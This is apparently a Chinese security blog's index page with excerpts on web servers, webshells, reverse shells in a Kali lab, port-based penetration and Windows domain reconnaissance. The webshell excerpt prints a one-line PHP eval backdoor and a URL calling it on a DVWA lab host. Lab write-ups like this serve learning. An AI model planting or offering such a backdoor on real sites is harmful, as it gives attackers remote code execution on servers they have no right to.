里丘~班诺的小屋

NAT篇

我们经常会被Web服务器、Web容器和Web中间件这三个概念搞混。因为我们常见的很多网站要么是由IIS搭建，要么是由Apache、Tomcat、Ngnix搭建。所以，我们会把他们都叫成是Web服务器，因为他们都提供了Web服务，可以让我们通过http协议访问到。但是又有很多地方会说Tomcat是Servlet容器，而又有很多地方会说Tomcat是Web中间件！那么，他们到底是Web服务器还是容器，还是Web中间件呢？？？怀着这个问题，我查遍了网上所有的资料，终于把这几个概念好好的整理了一下。

webshell小马:一句话木马也称为小马，即整个shell代码量只有一行，一般是系统执行函数大马: 代码量和功能比小马多，一般会进行二次编码加密，防止被安全防火墙/入侵系统检测到shell2.php #eval 使用php函数，例如phpinfo(); <?php eval($_REQUEST['pass']);?>http://192.168.238.131/dvwa/hackable/uploads/shell2.php?pass=phpinfo(); shel

切换python版本

反弹shell的时候，有点时候连的上有点时候连不上很迷经过测试，csdn会转换文件格式所以你直接复制下来会有问题其他博客网站上的复制暂未发现此问题一、打开端口监听kali监听1234端口 ，kali的ip是192.168.238.138二、手打代码打开反弹shell成功连接三、复制csdn上面的代码同一句话却报错大图，注意error是靶机的小毛病其他命令也会出行忽略即可，因为就算是换成其他靶机csdn上的代码有时也会报错四...

系统开机配置一、更换源┌──(root㉿kali)-[/home/kali/Desktop]└─# vim /etc/apt/sources.list#deb http://http.kali.org/kali kali-rolling main non-free contribdeb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/

0x00 背景通过端口来进行渗透有时会提升我们的效率。端口渗透过程中我们需要关注几个问题：端口的banner信息 端口上运行的服务 常见应用的默认端口当然对于上面这些信息的获取，我们有各式各样的方法，最为常见的应该就是nmap我们也可以结合其他的端口扫描工具，比如专门的3389、1433等等的端口扫描工具；一、服务默认端口公认端口(Well Known Ports)：0-1023，他们紧密绑定了一些服务；注册端口(Registered Ports)：1024-49151

一、判断是域环境还是工作组ipconfigsysteminfonet time /domain #查找域的时间，如果不是域会找不到net time /domain三种情况1、存在域，但是当前用户不是域用户2、存在域，当前用户是域用户3、不存在域二、查看操作系统版本信息和systeminfo | findstr /B /C:"OS name" /C:"OS version"systeminfo | findstr /B /C:"OS 名称"...